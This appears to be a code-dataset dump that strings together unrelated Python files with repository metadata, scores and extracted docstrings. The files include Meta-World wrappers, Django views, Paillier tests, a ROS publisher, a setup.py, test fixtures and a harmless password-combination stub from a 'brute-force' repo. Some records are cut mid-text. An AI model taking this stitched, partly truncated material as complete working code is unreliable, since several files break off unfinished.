handler_filter (str) -- Filter which needs to applied for handler execution Returns: dict -- Dictionary of values fetched from handler execution Raises: SDKExpception: if error in fetching handler data if input is not valid Returns the properties of this inventory as dict Returns the index server name associated with this inventory Returns the index server id associated with this inventory 
Returns the inventory id associated with this inventory Returns the inventory name associated with this inventory Returns the security blob associated with this inventory Returns the schedule class object for schedule associated with this inventory Returns the DataSource class object for datasource associated with this inventory Returns the Handler class object for default handler associated with this inventory Class to represent all assets in an inventory Initialize an object of the Assets class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Assets class gets the assets properties from inventory Args: None Returns: dict -- containing asset properties Refresh the assets details associated with this inventory Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package Checks whether given asset exists in inventory or not Args: asset_name (str) -- Name of the asset Returns: bool -- true if asset exists else false Returns the asset object Args: asset_name (str) -- Name of the asset Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if asset doesn't exists in inventory Adds asset to the inventory Args: asset_name (str) -- Name of the asset asset_type (Enum) -- type of asset (Refer to InventoryConstants.AssetType class) kwargs for FILE SERVER type Asset: fqdn -- File server FQDN os -- File Server OS type ip -- File server IP country_code -- Country code (ISO 3166 2-letter code) country_name -- Country name domain -- File Server Domain name(optional) Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if failed to add asset to inventory # if domain is not passed, then form domain from fqdn # always use asset name as 
file server name Delete the asset from the inventory Args: asset_name (str) -- Name of the asset Returns: None Raises: SDKException: if input is not valid if failed to delete the asset if unable to find this asset in inventory # for file server asset, asset name will not be display name in backend delete request. so fetch fqdn Returns the assets details associated with this inventory Class to represent single asset in an inventory Initialize an object of the Asset class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory asset_name (str) -- Name of the asset inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Asset class Returns the properties of this asset Args: None Returns: dict -- Containing properties of asset # for file server, we will not have asset id & crawl times Refresh the asset details associated with this Returns the job history details of this asset Args: None Returns: list(dict) -- containing job history details Raises: SDKException: if failed to get job history if asset is not supported for this operation Returns the job status details of this asset Args: None Returns: dict -- containing job status details Raises: SDKException: if failed to get job status if asset is not supported for this operation Starts collection job on this asset Args: wait_for_job (bool) -- specifies whether to wait for job to complete or not wait_time (int) -- time interval to wait for job completion in Mins Default : 60Mins Return: None Raises: SDKException: if failed to start collection job if asset is not supported for this operation returns the property value for given property name for this asset Args: prop_name (str) -- Name of the property Returns: str -- Value of the property Returns the asset id with this asset Returns the asset name with this asset Returns the crawl start time with this asset Returns the asset type for this asset Returns the asset status for this asset 
Returns the property values for this asset Returns the inventory id for this asset
1.622338
2
src/metarl/envs/ml_wrapper.py
icml2020submission6857/metarl
2
6623568
from metaworld.benchmarks import ML1, ML10, ML45 class ML1WithPinnedGoal(ML1): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML10WithPinnedGoal(ML10): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. 
See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML45WithPinnedGoal(ML45): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {}))
from metaworld.benchmarks import ML1, ML10, ML45 class ML1WithPinnedGoal(ML1): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML10WithPinnedGoal(ML10): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. 
See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML45WithPinnedGoal(ML45): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {}))
en
0.879184
A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. 
See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005
2.379863
2
catalog/views.py
matteostori/FerrariCatalog
0
6623569
<reponame>matteostori/FerrariCatalog from os import listdir from os.path import join from django.shortcuts import render from django.views import generic from FerrariCatalog.settings import BASE_DIR, STATIC_URL from .models import Car, Pilot # Create your views here. def index(request): """View function for home page of site.""" # Generate counts of some of the main objects num_cars = Car.objects.all().count() num_pilots = Pilot.objects.all().count() num_cars_y= Car.objects.filter(color__exact='yl').count() num_cars_r= Car.objects.filter(color__exact='rd').count() num_cars_b= Car.objects.filter(color__exact='bk').count() num_cars_bl= Car.objects.filter(color__exact='bl').count() context = { 'num_cars': num_cars, 'num_pilots': num_pilots, 'num_cars_y': num_cars_y, 'num_cars_r': num_cars_r, 'num_cars_b': num_cars_b, 'num_cars_bl': num_cars_bl, } # Render the HTML template index.html with the data in the context variable return render(request, 'index.html', context=context) #about page def about(request): return render(request, 'about.html') #simple view for listing all cars (paginated) class CarsListView(generic.ListView): paginate_by = 8 model = Car #detailed view of each car class CarsDetailView(generic.DetailView): model = Car def get_context_data(self, **kwargs): context = super(CarsDetailView, self).get_context_data(**kwargs) images_list = [] carimage_set = context['object'].carimage_set.all() if len(carimage_set) > 0: imagepath = carimage_set[0].path imagepath_dir = join(BASE_DIR, 'catalog/') + STATIC_URL + '/img/' + imagepath for f in listdir(imagepath_dir): images_list.append('img/' + imagepath + '/' + f) context['image_list'] = images_list return context #simple view for listing all pilots (paginated) class PilotListView(generic.ListView): paginate_by = 8 model = Pilot #detailed view of each pilot class PilotsDetailView(generic.DetailView): model = Pilot
from os import listdir from os.path import join from django.shortcuts import render from django.views import generic from FerrariCatalog.settings import BASE_DIR, STATIC_URL from .models import Car, Pilot # Create your views here. def index(request): """View function for home page of site.""" # Generate counts of some of the main objects num_cars = Car.objects.all().count() num_pilots = Pilot.objects.all().count() num_cars_y= Car.objects.filter(color__exact='yl').count() num_cars_r= Car.objects.filter(color__exact='rd').count() num_cars_b= Car.objects.filter(color__exact='bk').count() num_cars_bl= Car.objects.filter(color__exact='bl').count() context = { 'num_cars': num_cars, 'num_pilots': num_pilots, 'num_cars_y': num_cars_y, 'num_cars_r': num_cars_r, 'num_cars_b': num_cars_b, 'num_cars_bl': num_cars_bl, } # Render the HTML template index.html with the data in the context variable return render(request, 'index.html', context=context) #about page def about(request): return render(request, 'about.html') #simple view for listing all cars (paginated) class CarsListView(generic.ListView): paginate_by = 8 model = Car #detailed view of each car class CarsDetailView(generic.DetailView): model = Car def get_context_data(self, **kwargs): context = super(CarsDetailView, self).get_context_data(**kwargs) images_list = [] carimage_set = context['object'].carimage_set.all() if len(carimage_set) > 0: imagepath = carimage_set[0].path imagepath_dir = join(BASE_DIR, 'catalog/') + STATIC_URL + '/img/' + imagepath for f in listdir(imagepath_dir): images_list.append('img/' + imagepath + '/' + f) context['image_list'] = images_list return context #simple view for listing all pilots (paginated) class PilotListView(generic.ListView): paginate_by = 8 model = Pilot #detailed view of each pilot class PilotsDetailView(generic.DetailView): model = Pilot
en
0.853968
# Create your views here. View function for home page of site. # Generate counts of some of the main objects # Render the HTML template index.html with the data in the context variable #about page #simple view for listing all cars (paginated) #detailed view of each car #simple view for listing all pilots (paginated) #detailed view of each pilot
2.4016
2
app/src/main/python/test.py
zhongens/AcousticSensing
0
6623570
import math import random import numpy def get_random(): return random.randint(1, 100) def get_sqrt(x): return math.sqrt(x) def calculator(x,y,ope): print("enter python") if ope == "+": return x + y elif ope == "-": return x - y elif ope == "*": return x * y elif ope == "/": return x / y
import math import random import numpy def get_random(): return random.randint(1, 100) def get_sqrt(x): return math.sqrt(x) def calculator(x,y,ope): print("enter python") if ope == "+": return x + y elif ope == "-": return x - y elif ope == "*": return x * y elif ope == "/": return x / y
none
1
3.614145
4
code/data_owner_2/tests/test_paillier.py
ClarkYan/msc-thesis
7
6623571
import random from nose.tools import assert_raises import paillier def test_invmod(): assert_raises(ValueError, paillier.invmod, 0, 7) assert paillier.invmod(1, 7) == 1 p = 101 for i in range(1, p): iinv = paillier.invmod(i, p) assert (iinv * i) % p == 1 def test_keys_int(): priv = paillier.PrivateKey(7, 11, 77) assert priv.l == 60 assert priv.m == 9 pub = paillier.PublicKey(77) assert pub.g == 78 def test_keys_long(): priv, pub = paillier.generate_keypair(256) for i in range(5): assert paillier.invmod(priv.m, pub.n) == priv.l def test_encrypt_non_repeatable(): pub = paillier.PublicKey(15484279*32451217) for i in range(10): pt = random.randint(0, 1000000) assert paillier.encrypt(pub, pt) != paillier.encrypt(pub, pt) def test_decrypt(): for i in range(5): priv, pub = paillier.generate_keypair(64) for j in range(5): pt = long(random.randint(0, 1000000)) ct = paillier.encrypt(pub, pt) assert pt == paillier.decrypt(priv, pub, ct) def test_e_add(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) b = long(random.randint(0, 1000000)) ca, cb = paillier.encrypt(pub, a), paillier.encrypt(pub, b) cs = paillier.e_add(pub, ca, cb) s = paillier.decrypt(priv, pub, cs) assert a + b == s def test_e_add_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_add_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a + n == s def test_e_mul_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_mul_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a * n == s
import random from nose.tools import assert_raises import paillier def test_invmod(): assert_raises(ValueError, paillier.invmod, 0, 7) assert paillier.invmod(1, 7) == 1 p = 101 for i in range(1, p): iinv = paillier.invmod(i, p) assert (iinv * i) % p == 1 def test_keys_int(): priv = paillier.PrivateKey(7, 11, 77) assert priv.l == 60 assert priv.m == 9 pub = paillier.PublicKey(77) assert pub.g == 78 def test_keys_long(): priv, pub = paillier.generate_keypair(256) for i in range(5): assert paillier.invmod(priv.m, pub.n) == priv.l def test_encrypt_non_repeatable(): pub = paillier.PublicKey(15484279*32451217) for i in range(10): pt = random.randint(0, 1000000) assert paillier.encrypt(pub, pt) != paillier.encrypt(pub, pt) def test_decrypt(): for i in range(5): priv, pub = paillier.generate_keypair(64) for j in range(5): pt = long(random.randint(0, 1000000)) ct = paillier.encrypt(pub, pt) assert pt == paillier.decrypt(priv, pub, ct) def test_e_add(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) b = long(random.randint(0, 1000000)) ca, cb = paillier.encrypt(pub, a), paillier.encrypt(pub, b) cs = paillier.e_add(pub, ca, cb) s = paillier.decrypt(priv, pub, cs) assert a + b == s def test_e_add_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_add_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a + n == s def test_e_mul_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_mul_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a * n == s
none
1
2.242623
2
catkin_ws/src/beginner_tutorials/scripts/message.py
NevzatBOL/ROS-Beginner
2
6623572
<filename>catkin_ws/src/beginner_tutorials/scripts/message.py #!/usr/bin/env python import rospy from beginner_tutorials.msg import Num def talker(): rospy.init_node('message_talker',anonymous=True) pub = rospy.Publisher('talker',Num) r = rospy.Rate(10) msg = Num() msg.num = 4 while not rospy.is_shutdown(): rospy.loginfo(msg) pub.publish(msg) r.sleep() if __name__ == '__main__': try: talker() except rospy.ROSInterruptException: pass
<filename>catkin_ws/src/beginner_tutorials/scripts/message.py #!/usr/bin/env python import rospy from beginner_tutorials.msg import Num def talker(): rospy.init_node('message_talker',anonymous=True) pub = rospy.Publisher('talker',Num) r = rospy.Rate(10) msg = Num() msg.num = 4 while not rospy.is_shutdown(): rospy.loginfo(msg) pub.publish(msg) r.sleep() if __name__ == '__main__': try: talker() except rospy.ROSInterruptException: pass
ru
0.26433
#!/usr/bin/env python
2.462111
2
setup.py
pavoljuhas/diffpy.Structure
19
6623573
<filename>setup.py #!/usr/bin/env python """Objects for storage and manipulation of crystal structure data. Packages: diffpy.structure """ import os import re import sys from setuptools import setup, find_packages # Use this version when git data are not available, like in git zip archive. # Update when tagging a new release. FALLBACK_VERSION = '3.0.1.post0' # determine if we run with Python 3. PY3 = (sys.version_info[0] == 3) # versioncfgfile holds version data for git commit hash and date. # It must reside in the same directory as version.py. MYDIR = os.path.dirname(os.path.abspath(__file__)) versioncfgfile = os.path.join(MYDIR, 'src/diffpy/structure/version.cfg') gitarchivecfgfile = os.path.join(MYDIR, '.gitarchive.cfg') def gitinfo(): from subprocess import Popen, PIPE kw = dict(stdout=PIPE, cwd=MYDIR, universal_newlines=True) proc = Popen(['git', 'describe', '--match=v[[:digit:]]*'], **kw) desc = proc.stdout.read() proc = Popen(['git', 'log', '-1', '--format=%H %ct %ci'], **kw) glog = proc.stdout.read() rv = {} rv['version'] = '.post'.join(desc.strip().split('-')[:2]).lstrip('v') rv['commit'], rv['timestamp'], rv['date'] = glog.strip().split(None, 2) return rv def getversioncfg(): if PY3: from configparser import RawConfigParser else: from ConfigParser import RawConfigParser vd0 = dict(version=FALLBACK_VERSION, commit='', date='', timestamp=0) # first fetch data from gitarchivecfgfile, ignore if it is unexpanded g = vd0.copy() cp0 = RawConfigParser(vd0) cp0.read(gitarchivecfgfile) if len(cp0.get('DEFAULT', 'commit')) > 20: g = cp0.defaults() mx = re.search(r'\btag: v(\d[^,]*)', g.pop('refnames')) if mx: g['version'] = mx.group(1) # then try to obtain version data from git. 
gitdir = os.path.join(MYDIR, '.git') if os.path.exists(gitdir) or 'GIT_DIR' in os.environ: try: g = gitinfo() except OSError: pass # finally, check and update the active version file cp = RawConfigParser() cp.read(versioncfgfile) d = cp.defaults() rewrite = not d or (g['commit'] and ( g['version'] != d.get('version') or g['commit'] != d.get('commit'))) if rewrite: cp.set('DEFAULT', 'version', g['version']) cp.set('DEFAULT', 'commit', g['commit']) cp.set('DEFAULT', 'date', g['date']) cp.set('DEFAULT', 'timestamp', g['timestamp']) with open(versioncfgfile, 'w') as fp: cp.write(fp) return cp versiondata = getversioncfg() with open(os.path.join(MYDIR, 'README.rst')) as fp: long_description = fp.read() # define distribution setup_args = dict( name = "diffpy.structure", version = versiondata.get('DEFAULT', 'version'), packages = find_packages(os.path.join(MYDIR, 'src')), py_modules = ['diffpy.Structure'], package_dir = {'' : 'src'}, test_suite = 'diffpy.structure.tests', include_package_data = True, zip_safe = False, install_requires = [ 'six', 'pycifrw>=4.2', ], author = '<NAME>', author_email = '<EMAIL>', maintainer = '<NAME>', maintainer_email = '<EMAIL>', url = 'https://github.com/diffpy/diffpy.structure', description = "Crystal structure container " "and parsers for structure formats.", long_description = long_description, long_description_content_type = 'text/x-rst', license = 'BSD-style license', keywords = "crystal structure data storage CIF PDB", classifiers = [ # List of possible values at # http://pypi.python.org/pypi?:action=list_classifiers 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Operating System :: MacOS :: MacOS X', 'Operating System :: Microsoft :: Windows', 'Operating System :: POSIX', 'Operating System :: Unix', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 
'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering :: Chemistry', 'Topic :: Scientific/Engineering :: Physics', ], ) if __name__ == '__main__': setup(**setup_args)
<filename>setup.py #!/usr/bin/env python """Objects for storage and manipulation of crystal structure data. Packages: diffpy.structure """ import os import re import sys from setuptools import setup, find_packages # Use this version when git data are not available, like in git zip archive. # Update when tagging a new release. FALLBACK_VERSION = '3.0.1.post0' # determine if we run with Python 3. PY3 = (sys.version_info[0] == 3) # versioncfgfile holds version data for git commit hash and date. # It must reside in the same directory as version.py. MYDIR = os.path.dirname(os.path.abspath(__file__)) versioncfgfile = os.path.join(MYDIR, 'src/diffpy/structure/version.cfg') gitarchivecfgfile = os.path.join(MYDIR, '.gitarchive.cfg') def gitinfo(): from subprocess import Popen, PIPE kw = dict(stdout=PIPE, cwd=MYDIR, universal_newlines=True) proc = Popen(['git', 'describe', '--match=v[[:digit:]]*'], **kw) desc = proc.stdout.read() proc = Popen(['git', 'log', '-1', '--format=%H %ct %ci'], **kw) glog = proc.stdout.read() rv = {} rv['version'] = '.post'.join(desc.strip().split('-')[:2]).lstrip('v') rv['commit'], rv['timestamp'], rv['date'] = glog.strip().split(None, 2) return rv def getversioncfg(): if PY3: from configparser import RawConfigParser else: from ConfigParser import RawConfigParser vd0 = dict(version=FALLBACK_VERSION, commit='', date='', timestamp=0) # first fetch data from gitarchivecfgfile, ignore if it is unexpanded g = vd0.copy() cp0 = RawConfigParser(vd0) cp0.read(gitarchivecfgfile) if len(cp0.get('DEFAULT', 'commit')) > 20: g = cp0.defaults() mx = re.search(r'\btag: v(\d[^,]*)', g.pop('refnames')) if mx: g['version'] = mx.group(1) # then try to obtain version data from git. 
gitdir = os.path.join(MYDIR, '.git') if os.path.exists(gitdir) or 'GIT_DIR' in os.environ: try: g = gitinfo() except OSError: pass # finally, check and update the active version file cp = RawConfigParser() cp.read(versioncfgfile) d = cp.defaults() rewrite = not d or (g['commit'] and ( g['version'] != d.get('version') or g['commit'] != d.get('commit'))) if rewrite: cp.set('DEFAULT', 'version', g['version']) cp.set('DEFAULT', 'commit', g['commit']) cp.set('DEFAULT', 'date', g['date']) cp.set('DEFAULT', 'timestamp', g['timestamp']) with open(versioncfgfile, 'w') as fp: cp.write(fp) return cp versiondata = getversioncfg() with open(os.path.join(MYDIR, 'README.rst')) as fp: long_description = fp.read() # define distribution setup_args = dict( name = "diffpy.structure", version = versiondata.get('DEFAULT', 'version'), packages = find_packages(os.path.join(MYDIR, 'src')), py_modules = ['diffpy.Structure'], package_dir = {'' : 'src'}, test_suite = 'diffpy.structure.tests', include_package_data = True, zip_safe = False, install_requires = [ 'six', 'pycifrw>=4.2', ], author = '<NAME>', author_email = '<EMAIL>', maintainer = '<NAME>', maintainer_email = '<EMAIL>', url = 'https://github.com/diffpy/diffpy.structure', description = "Crystal structure container " "and parsers for structure formats.", long_description = long_description, long_description_content_type = 'text/x-rst', license = 'BSD-style license', keywords = "crystal structure data storage CIF PDB", classifiers = [ # List of possible values at # http://pypi.python.org/pypi?:action=list_classifiers 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Operating System :: MacOS :: MacOS X', 'Operating System :: Microsoft :: Windows', 'Operating System :: POSIX', 'Operating System :: Unix', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 
'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering :: Chemistry', 'Topic :: Scientific/Engineering :: Physics', ], ) if __name__ == '__main__': setup(**setup_args)
en
0.633419
#!/usr/bin/env python Objects for storage and manipulation of crystal structure data. Packages: diffpy.structure # Use this version when git data are not available, like in git zip archive. # Update when tagging a new release. # determine if we run with Python 3. # versioncfgfile holds version data for git commit hash and date. # It must reside in the same directory as version.py. # first fetch data from gitarchivecfgfile, ignore if it is unexpanded # then try to obtain version data from git. # finally, check and update the active version file # define distribution # List of possible values at # http://pypi.python.org/pypi?:action=list_classifiers
1.959879
2
backend/medicar/tests/fixture.py
WesGtoX/medicar
2
6623574
<reponame>WesGtoX/medicar<filename>backend/medicar/tests/fixture.py import factory from faker import Faker from medicar.models import ( Specialty, Doctor, Agenda, MedicalAppointment ) fake = Faker(['pt_BR']) class SpecialtyFactory(factory.django.DjangoModelFactory): """Fixture for creating a Specialty""" class Meta: model = Specialty name = factory.Faker('word', ext_word_list=['Cardiologia', 'Pediatria']) class DoctorFactory(factory.django.DjangoModelFactory): """Fixture for creating a Doctor""" class Meta: model = Doctor name = factory.Faker('first_name') crm = factory.Faker('pyint', min_value=1000, max_value=9999, step=1) email = factory.Faker('ascii_email') phone = f'+{fake.msisdn()}' class AgendaFactory(factory.django.DjangoModelFactory): """Fixture for creating an Agenda""" class Meta: model = Agenda day = factory.Faker('date_between', start_date='today', end_date='+1y') schedule = ['00:00', '08:00', '08:30', '09:00', '09:30', '14:00'] @classmethod def _create(cls, model_class, *args, **kwargs): obj = model_class(*args, **kwargs) obj.doctor = DoctorFactory.create(specialty=SpecialtyFactory.create()) obj.save() return obj class MedicalAppointmentFactory(factory.django.DjangoModelFactory): """Fixture for creating a Medical Appointment""" class Meta: model = MedicalAppointment hourly = factory.Faker('word', ext_word_list=['08:00', '08:30', '09:00', '09:30', '14:00'])
import factory from faker import Faker from medicar.models import ( Specialty, Doctor, Agenda, MedicalAppointment ) fake = Faker(['pt_BR']) class SpecialtyFactory(factory.django.DjangoModelFactory): """Fixture for creating a Specialty""" class Meta: model = Specialty name = factory.Faker('word', ext_word_list=['Cardiologia', 'Pediatria']) class DoctorFactory(factory.django.DjangoModelFactory): """Fixture for creating a Doctor""" class Meta: model = Doctor name = factory.Faker('first_name') crm = factory.Faker('pyint', min_value=1000, max_value=9999, step=1) email = factory.Faker('ascii_email') phone = f'+{fake.msisdn()}' class AgendaFactory(factory.django.DjangoModelFactory): """Fixture for creating an Agenda""" class Meta: model = Agenda day = factory.Faker('date_between', start_date='today', end_date='+1y') schedule = ['00:00', '08:00', '08:30', '09:00', '09:30', '14:00'] @classmethod def _create(cls, model_class, *args, **kwargs): obj = model_class(*args, **kwargs) obj.doctor = DoctorFactory.create(specialty=SpecialtyFactory.create()) obj.save() return obj class MedicalAppointmentFactory(factory.django.DjangoModelFactory): """Fixture for creating a Medical Appointment""" class Meta: model = MedicalAppointment hourly = factory.Faker('word', ext_word_list=['08:00', '08:30', '09:00', '09:30', '14:00'])
en
0.898762
Fixture for creating a Specialty Fixture for creating a Doctor Fixture for creating an Agenda Fixture for creating a Medical Appointment
2.223432
2
test_iterator.py
sangeeth98/brute-force-on-zipfiles
0
6623575
<reponame>sangeeth98/brute-force-on-zipfiles<gh_stars>0 import itertools, zipfile, time import concurrent.futures options = 'abcdefghijklmnopqrstuvwxyz0123456789' #combos made to range from 1 character to 8# combos = itertools.product((options),repeat = 3) # x = iter(combos) # def printnext(it): # print(next(it)) # return 0 # with concurrent.futures.ThreadPoolExecutor() as executor: # result = [executor.submit(printnext, x) for _ in range(200)] count = 0 for i in combos: print(i) count+=1 if(count == 200): break
import itertools, zipfile, time import concurrent.futures options = 'abcdefghijklmnopqrstuvwxyz0123456789' #combos made to range from 1 character to 8# combos = itertools.product((options),repeat = 3) # x = iter(combos) # def printnext(it): # print(next(it)) # return 0 # with concurrent.futures.ThreadPoolExecutor() as executor: # result = [executor.submit(printnext, x) for _ in range(200)] count = 0 for i in combos: print(i) count+=1 if(count == 200): break
en
0.776674
#combos made to range from 1 character to 8# # x = iter(combos) # def printnext(it): # print(next(it)) # return 0 # with concurrent.futures.ThreadPoolExecutor() as executor: # result = [executor.submit(printnext, x) for _ in range(200)]
3.002462
3
slide_12.py
JakeRoggenbuck/strategy_presentation_numpy
0
6623576
<gh_stars>0 # Not runnable key = "<KEY>" request_headers = {"X-TBA-Auth-Key": key} {"X-TBA-Auth-Key": "<KEY>"}
# Not runnable key = "<KEY>" request_headers = {"X-TBA-Auth-Key": key} {"X-TBA-Auth-Key": "<KEY>"}
en
0.791515
# Not runnable
1.396844
1
tierpsy/analysis/compress_add_data/getAdditionalData.py
mgh17/tierpsy-tracker
9
6623577
""" # -*- coding: utf-8 -*- Created on Thu Dec 17 10:10:35 2015 @author: ajaver """ import os import stat import xml.etree.ElementTree as ET import tables import numpy as np import csv from collections import OrderedDict #%% Read/Store the XML file with the pixel size and fps info def storeXMLInfo(info_file, masked_image_file): with open(info_file, 'r') as fid: xml_info = fid.read() # if it is empty the xml create a node and exit if not xml_info: with tables.File(masked_image_file, 'r+') as fid: fid.create_array('/', 'xml_info', obj=bytes('', 'utf-8')) return # read the xml and exit root = ET.fromstring(xml_info) x_microns = float(root.findall( './info/stage/steps/equivalent/microns/x')[0].text) y_microns = float(root.findall( './info/stage/steps/equivalent/microns/y')[0].text) x_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/x')[0].text) y_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/y')[0].text) fps = float(root.findall('./info/camera/display/frame/rate')[0].text) pixels2microns_x = x_microns / x_pixels pixels2microns_y = y_microns / y_pixels with tables.File(masked_image_file, 'r+') as fid: if '/xml_info' in fid: fid.remove_node('/', 'xml_info') xml_node = fid.create_array( '/', 'xml_info', obj=bytes( xml_info, 'utf-8')) masks_node = fid.get_node('/', 'mask') masks_node.attrs['fps'] = fps masks_node.attrs['pixels2microns_x'] = pixels2microns_x masks_node.attrs['pixels2microns_y'] = pixels2microns_y # Read the scale conversions, we would need this when we want to convert the pixels into microns pixelPerMicronX = 1/pixels2microns_x pixelPerMicronY = 1/pixels2microns_y normScale = np.sqrt((pixelPerMicronX ** 2 + pixelPerMicronX ** 